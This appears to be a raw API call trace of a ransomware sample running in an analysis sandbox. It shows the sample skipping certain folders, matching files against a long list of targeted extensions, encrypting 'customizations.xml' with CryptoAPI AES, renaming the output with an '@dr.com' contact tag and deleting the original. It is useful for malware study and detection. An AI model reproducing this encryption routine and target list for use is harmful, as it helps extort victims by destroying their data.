	[0174.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="webcache") returned 0x0
	[0174.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="inetcache") returned 0x0
	[0174.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="nvidia") returned 0x0
	[0174.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="packages") returned 0x0
	[0174.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="cookies") returned 0x0
	[0174.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="programdata") returned 0x0
	[0174.364] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0174.364] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d7b677, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d7b677, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0da18e6, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x8a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0174.364] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0174.364] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0174.365] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\"
	[0174.365] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"
	[0174.365] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned 99
	[0174.365] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.365] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned 0x63
	[0174.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.365] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"
	[0174.366] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned 99
	[0174.366] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.366] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0174.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.366] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0174.367] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.367] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.367] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.369] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x8a0, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x8a0, lpOverlapped=0x0) returned 1
	[0174.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.374] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcbaa0) returned 1
	[0174.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.376] CryptCreateHash (in: hProv=0xfcbaa0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0174.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.377] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0174.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.377] CryptDeriveKey (in: hProv=0xfcbaa0, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9430) returned 1
	[0174.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.377] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x8a0, dwBufLen=0x8a0 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x8b0) returned 1
	[0174.377] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.378] RtlMoveMemory (in: Destination=0xfde528, Source=0xfdc138, Length=0x8a0 | out: Destination=0xfde528) 
	[0174.378] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.378] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde528*, pdwDataLen=0x18a1ec*=0x8a0, dwBufLen=0x8b0 | out: pbData=0xfde528*, pdwDataLen=0x18a1ec*=0x8b0) returned 1
	[0174.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.379] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0174.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.379] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0174.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.379] CryptReleaseContext (hProv=0xfcbaa0, dwFlags=0x0) returned 1
	[0174.379] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.380] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.380] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0174.381] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0174.381] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.383] WriteFile (in: hFile=0x39c, lpBuffer=0xfde528*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde528*, lpNumberOfBytesWritten=0x18a648*=0x8b0, lpOverlapped=0x0) returned 1
	[0174.386] CloseHandle (hObject=0x39c) returned 1
	[0174.388] CloseHandle (hObject=0x390) returned 1
	[0174.388] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml")) returned 1
	[0174.391] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml")) returned 0
	[0174.391] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d2f19c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d2f19c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0174.391] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0174.392] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0174.392] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\"
	[0174.392] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml"
	[0174.392] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml") returned 100
	[0174.392] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.392] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml") returned 0x64
	[0174.392] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.392] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.393] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"
	[0174.393] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml") returned 100
	[0174.393] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.393] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.393] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0174.393] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.394] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc